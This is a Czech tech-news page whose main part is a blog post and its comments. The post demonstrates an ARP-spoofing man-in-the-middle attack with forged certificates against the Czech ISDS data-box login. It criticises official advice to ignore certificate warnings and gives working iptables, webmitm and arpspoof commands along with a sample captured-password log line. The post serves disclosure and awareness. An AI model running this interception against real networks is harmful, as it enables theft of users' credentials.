Desktopové prostředí LXQt (Lightweight Qt Desktop Environment, Wikipedie) vzniklé sloučením projektů Razor-qt a LXDE bylo vydáno ve verzi 2.1.0. Přehled novinek v poznámkách k vydání.
Aplikace LocalSend, tj. multiplatformní open source alternativa k AirDropu, tj. bezpečné sdílení souborů a zpráv s okolními zařízeními přes lokální síť, bez potřeby připojení k internetu, byla vydána ve verzi 1.16, aktuálně 1.16.1. Instalovat lze také z Flathubu a Snapcraftu.
Nejnovější publikace v knižní edici správce české národní domény nese název ESP32 prakticky a jejím autorem je Martin Malý. Kniha je průvodcem ve světě výkonných a velmi bohatě vybavených mikrokontrolérů společnosti Espressif. V knize se naučíte, jak využít tento čip pro různé projekty, od základního nastavení a programování ESP32 v Arduino IDE, přes připojení k Wi-Fi a Bluetooth, až po pokročilé techniky, jako je realtime operační systém FreeRTOS, příjem signálu z družic nebo programování v ESP-IDF.
Byl představen nový oficiální 7palcový Raspberry Pi Touch Display 2. Rozlišení 720 × 1280 pixelů. Cena 60 dolarů.
Na čem aktuálně pracují vývojáři webového prohlížeče Ladybird (GitHub)? Byl publikován přehled vývoje za říjen (YouTube).
Byla vydána verze 0.4.0 v Rustu napsaného frameworku Pingora pro vytváření rychlých, spolehlivých a programovatelných síťových systémů. Z novinek lze vypíchnout počáteční podporu Rustls, tj. implementaci TLS v Rustu. Společnost Cloudflare uvolnila framework Pingora letos v únoru pod licencí Apache 2.0.
Byla vydána první pre-release verze desktopového prostředí Xfce (Wikipedie). Vydání ostré verze je plánováno na 15. prosince. Současně byla vyhlášena soutěž o výchozí wallpaper pro Xfce 4.20. Uzávěrka přihlášek je 15. listopadu.
Přímý přenos z konference OpenAlt 2024, jež probíhá tento víkend v prostorách FIT VUT v Brně. Na programu je spousta zajímavých přednášek. Pokud jste v Brně, stavte se. Vstup zdarma.
V Coloradu unikla hesla k volebním počítačům. Více než 2 měsíce byla tabulka se stovkami hesel do BIOSu volně na webových stránkách. Dle úřadu je potřeba ještě druhé heslo, takže se o žádnou bezprostřední bezpečnostní hrozbu pro volby nejedná [Ars Technica].
Apple kupuje Pixelmator Team stojící za grafickými editory Pixelmator, Pixelmator Pro a Photomator.
Volbou přidání certifikátů k důvěryhodným certifikátům či pokračováním na stránku ISDS nevzniká žádné bezpečnostní riziko. Nebo vzniká?
slibovaný návod na arpspoofing v druhé polovině blogpostu
Na datoveschranky.info je hned na první stránce napsáno, že pokud nás při toulkách po portálu zastihne upozornění o neověřitelném certifikátu, máme jej vesele ignorovat a odkliknout. Zajímavé je, že málokoho napadne možné bezpečnostní riziko takového jednání. I sám Pan Ředitel ve včerejší zábavní estrádě prokázal, že má ohledně počítačové bezpečnosti mnohé mezery. A znáte to s tou kovářovic kobylou?
Pojďme si tedy ukázat, co se může stát, když bude uživatel bezhlavě odklikávat OK. Dostat se někomu do datové schránky není zas tak složité...
Cílem článku je především demonstrace, jak snadný může být man-in-the-middle útok. Nemusím doufám upozorňovat, že neručím za žádné problémy vzniklé aplikací zde popisovaných postupů. Nevhodné použití popisovaných programů může vést až k rozpadu vaší sítě, takže si dávejte bacha a zkoušejte si to radši jenom někde, kde to nikomu nevadí. Zneužití cizí DS je pochopitelně trestné.
Neumím efektně stříhat video, takže si to asi Mrkva bude muset natočit sám.
Předpokládám, že tušíte, jak funguje HTTPS a podepisování certifikátů. Také byste měli alespoň zhruba tušit, jak probíhá komunikace v ethernetových sítích a tak...
Nejdřív na svém počítači rozjedeme transparentní proxy, potom přes něj přesměrujeme komunikaci počítače oběti, podvrhneme vlastní certifikát a odposlechneme heslo. Jak prosté, milý Watsone.
Náš počítač je v ethernetové síti realizované switchem, který neumí management portů (většina levnějších switchů), nebo ho nemá nastavený (většina dražších switchů). Takže třeba na koleji na Silicon Hillu to nepůjde. Předpokládám, že na svém počítači máme roota, že známe IP adresu počítače oběti a IP gatewaye. Ze softwaru budeme potřebovat iptables
, webmitm
a arpspoof
z balíku dsniff
.
V tomto kroku si vyrobíme vlastní certifikát (self-signed) a budeme poslouchat na portech 80 a 443 a logovat veškeré požadavky, které přes nás půjdou. Dále při pokusu o komunikaci s HTTP serverem s HTTPS stáhneme jeho certifikát, našemu klientovi podstrčíme svůj certifikát a požadavky od klienta vždycky naším soukromým klíčem rozšifrujeme, poznamenáme si je do logu, zašifrujeme "pravým" certifikátem a odešleme.
#zapneme forwarding cizích paketů echo 1 > /proc/sys/net/ipv4/ip_forward #natlačíme do iptablů potřebná pravidla; v tabulce nat ani obecně by neměla být žádná s nimi konfliktní, kdyžtak si napřed celé iptably vyflushujte iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT #spustíme webmitm; začne si generovat certifikát - vyplníme co nejvěrohodněji vypadající údaje webmitm #webmitm ukončíme, zapneme logování požadavků (debug mód) a necháme ho logovat do souboru webmitm -dd 2> soubor
Když se teď připojíme na port 80 nebo 443 počítače, jeho chování by mělo velmi připomínat proxy a v souboru by měly být všechny vyslané požadavky.
Teď potřebujeme, aby zvolená oběť posílala veškerou komunikaci přes nás. Toho dosáhneme jednoduše tím, že na ni začneme křičet, že brána jsme MY. Zároveň začneme křičet na bránu, že MY jsme oběť.
arpspoof -t oběť brána arpspoof -t brána oběť
Když se oběť pokusí spojit s czebox.cz (ano, netestuji to na živé datové schránce), objeví se pochopitelně okýnko (v případě Firefoxu stránka), že jako certifikát hu, které podle instrukcí České pošty odklikne. Až se přihlásí, nám se v logu objeví řádek podobný tomuto:
option=credential&target=https%3A%2F%2Fwww.czebox.cz%2Fportal%2FISDS%2F&Ecom_User_ID=nejakejmeno&Ecom_Password=nejakeheslo&submit.x=89&submit.y=27&submit=Login
(tip: doporučuji pustit na log grep s uživatelským jménem nebo alespoň nějakým jiným dostatečně unikátním řetězcem (submit=Login
), log je fakt dlouhý)
No a to je vše...
Naimportovat si kořenový certifikát CA PostSignum a nějak si ověřit jeho SHA1sum.
Pokud to bude někdo filmovat, dejte sem pak link
Doporučený titulek pro Blesk a TV Nova: Student se naboural do systému datových schránek!
UPDATE: Pokračování
Tiskni Sdílej:
Máš pravdu, v .info IDN nefunguje: http://www.datovéschránky.info/
Za phising a blbost uzivatele samozrejme posta nemuze. Ale phishing je nejjednodussi a pokud navic oficialni mista radi ignorovat varovani o neoverenem certifikatu, je to opravdu jednoduche presmerovat uzivatele na nejakou jinou stranku. Je to o hodne jednodussi na rozdil od zminovaneho prikladu s vnucenim obeti nasi GW, a navic univerzalnejsi, kdyz obet nemusi byt v nasi siti. Stejne tak DNS poisoning je o dost slozitejsi, nez jednoduchej phishing.
Proste chtelo by to udelat co nejjednodussi ukazku, jinak budou prave ti "profesionalove" jako ve zminenem rozhovoru pouze argumentovat, ze to je slozite, ze to musi byt na stejne siti atd. Presmerovat nekoho z emailu je opravdu jednoduche a funguje to vsude.
Proste chtelo by to udelat co nejjednodussi ukazku, jinak budou prave ti "profesionalove" jako ve zminenem rozhovoru pouze argumentovat, ze to je slozite, ze to musi byt na stejne siti atd.Jak ukázku? Jako poslat mail (s From: info@datoveschranky.info) a v něm mít odkaz na falešnou stránku? A jak se proti tomu má pošta bránit?
Nebo se může využít nějaká díra v mailovém klientovy či browseru, skrz kterou jde provést libovolný kód útočníka (a že jich ve Windows bylo - většina záplat řešila právě takové chyby), potom stačí například upravit soubor hosts, takže oběť nepozná, že se připojuje úplně někam jinam.Nebo rovnou nainstalovat keylogger, že. Zase - za děravý browser klienta nemůže pošta.
Naimportovat si kořenový certifikát CA PostSignum a nějak si ověřit jeho SHA1sum.Vyžádal jsem si již včera vyjádření PostSignum QCA, jak certifikát bezpečně ověřit. Pokud nedostanu uspokojivou odpověď, podám podnět k ministerstvu vnitra* pro porušení § 6, odst. 1, písm. a) zákona 227/2000 Sb. () Za to lze podle § 18a, odst. 6, uložit pokutu do 10 milionů Kč. Podle certifikační politiky kořenového certifikátu by mělo jít nechat si na "registračních autoritách" (pracovištích ČP) nakopírovat kořenový certifikát na médium. Toto také každému doporučuji, protože je to jediný bezpečný způsob. *Problém je v tom, že Česká pošta s.p. patří pod ministerstvo vnitra. Proto bude MV kontrolovat případné porušení zákona ve své vlastní organizaci, čili nemusí mít zájem na tom, aby se porušení zákona prokázalo.
Nedostane každý při zřízení oné schránky nějaké papíry? Pak by se SHA1sum mohla otisknout právně v nich, spolu s popisem, jak ověřit, že certifikát není podvrženýByla by to samozřejmě dobrá cesta, ale nedělám si moc velké iluze, že se tam fingerprint dnes uvádí (téměř jistě ne), ani že to tam jen tak sami od sebe začnou uvádět. Kdyžtak je bude potřeba k tomu dokopat (nebo k jiné srovnatelně bezpečné a pohodlné cestě). Nicméně primární by mělo být poskytnutí přes pracoviště ČP, jak je to uvedeno v jejich politice. Jsem zvědav, co mi odpoví (protože by měli odpovědět to, co je v politice uvedeno, případně na ni odkázat). Pak zkusím přijít na poštu (kam stejně musím, protože mi před časem propadl elektronický podpis - zapomněl jsem ho včas prodloužit) a nechat si nakopírovat kořenový certifikát. Doufám, že se nebudou tvářit, že nevědí, co po nich chci. A právě, jak už jsem říkal, ať to zatím takhle dělá každý, protože certifikát získaný přes HTTP může být podvržený.
Hmmm, kdyz jsem sepisoval smlouvu na inet bakovnictvi do KB, tak jsem mel ve smlouve i nejakej checksum - nevim ted, jestli tehdy jeste MD5 nebo uz i SHA1, ale kontroloval jsem to, ale navic KB to ma podepsany verisignem. Mozna to stejnym zpusobem maji i datovyschranky.
Každý dostane u PostSignum společně s certifikátem i kořenové certifikáty na flashku. Tak předpokládám, že je možné je získat i na vyžádání, bez žádosti o vytvoření certifikátu.
A je tu duvod ji rozebirat.
Mj jestli potkavate p Koupeho (osobnosti.cz) tak ho ode mne pozdravujte.
Dekuji
Dostat do prohlížečů další certifikační autoritu je prakticky nemožné, zvlášť pokud se týká jen jednoho státu. Podobně hezké by bylo, kdyby se tam dostala např. CA CESNETu, ale to je také nereálné.
Řešením tedy je, mít bezpečný server s HTTPS certifikátem podepsaným nějakou důvěryhodnou* autoritou a umožnit lidem si z něj stahovat certifikáty českých CA.
*) uznávanou v prohlížečích. A zároveň šířit otisk toho certifikátu i jinou cestou.
K tomu bych si dovolil dodat modifikovanou hlasku z jednoho ceskeho filmu:
Hlavne o tom zvante d******e, at mame na krku IT kriminalku.
Vsak jo. Vase ciny jsou chvalihodne.
Je treba hledat bezpecnostni problemy.
Předmět: Zavádějící tvrzení na datoveschranky.info -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dobrý den, na adrese http://datoveschranky.info/ je uvedeno velmi zavádějící tvrzení, jehož dodržení může ohrozit bezpečnost uživatele: "Při pokusu o přihlášení do systému ISDS se může objevit varování, upozorňující na problém s bezpečnostním certifikátem stránky. Toto je způsobeno nepřítomností certifikátu ve standardní instalaci MS Windows či jiných operačních systémů. Upozornění je nutno ignorovat; vstup na stránku je zcela bezpečný neboť používaný certifikát je vydán kvalifikovanou českou certifikační autoritou. Volbou přidání certifikátů k důvěryhodným certifikátům či pokračováním na stránku ISDS nevzniká žádné bezpečnostní riziko." Pokud se uživatel bude těmito instrukcemi řídit, nainstaluje si certifikát, u kterého nemůže ověřit, jestli ho opravdu vydalo PostSignum nebo ho podvrhl útočník. Vhodnější by bylo, pokud byste uvedli, jak si naimportovat kořenový certifikát PostSigna a ověřit jeho integritu. Děkuji za vyjádření, Jan Hrach - -- Jan Hrach Mail: jenda {} hrach.eu Jabber: hrachj {} abclinuxu.cz GPG: http://ftp.hrach.eu/jenda/public.key 1D9D AC4B E964 0D1E 7F5D 6E03 B72F 6430 9FA4 F536 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkpOMj8ACgkQty9kMJ+k9TawnQCg7apv2DFC8SW+UpS6+OXPJ/mG w6kAniPI+lyxSOYDQSCRsrbHyft9BIjW =J1UN -----END PGP SIGNATURE-----
Tak to se tu za vsechny tesim na odpoved. Ani bych se nedivil kdyby neodpovedeli - k tomu mailu totiz neni co dodat.
Mozna je to blba otazka, ale nestoji pokus o napadeni timto zpusobem na nutnosti byt s napadenym ve stejne siti a to jeste na hubu, ktery posila data vsem a ty pak jdou zachytit treba wiresharkem, ktery prepne sitovku do promiskuitniho rezimu?
Cili, pokud jsem priojen do switche, ktery neposila vse vsem, ale jenom tomu, komu ma, tak jsem za vodou?
Prosím tě, kde žiješ? Copak nevíš, co o tom kážou odborníci na prohlížeče?
One of the most common operations performed in a Web page is to detect the browser type and version.
HTTP je stejně víc zvykové právo, než nějaký přesně specifikovaný protokolOpravdu HTTP? Nenapadá mne nic, co by se dnes masově při HTTP komunikaci používalo, a bylo to v rozporu se specifikací HTTP nebo v ní nebylo uvedeno.
Nicméně pokud se odpověď výrazně liší podle user-agent v hlavičce, tak je to prostě problém, a dít by se to nemělo.Specifikace protokolu HTTP na to má jiný názor a dokonce specifikuje hlavičku
Vary
, na základě které se určí, které hlavičky HTTP dotazu ovlivňují výběr odpovědi.
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5
Za to ze si nekdo vubec dovoli davat detekci podle user agentu a ostatnim znemoznit funkcnost, by mel prijit o svoje pracovni misto. Varovani beru, ale naprosty znefunkcneni stranky kvuli jiny identifikaci browseru je fakt silny kafe.Samotná Mozilla na tom nebyla o moc lépe.
Omluvte plánovanou odstávku informačního systému datových schránek od 4. 7. do 5. 7.Muhehe, čtyři dny to jelo a už si naplánovali odstávku
Omlouváme se všem uživatelům Datových schránek, v současné době probíhá plánovaná odstávka, z důvodů prací spojených s náběhem systému. Práce se týkají implementace změn v systému Datových schránek, které vyplývají z Novely zákona 300/2008 Sb. Probíhá rovněž plánované zátěžové testování systému a činnosti, které souvisí s další etapou bezpečnostního auditu systému Datových schránek.Že by se ledy hnuly?
Jenže „maximální snaha“ neříká nic o tom, zda se výsledku podařilo dosáhnout – píše-li to luser, ani maximální snažení nebude korunováno XHTML validitou
Ad BFW – existuje i něco jako BFU Friendly Web?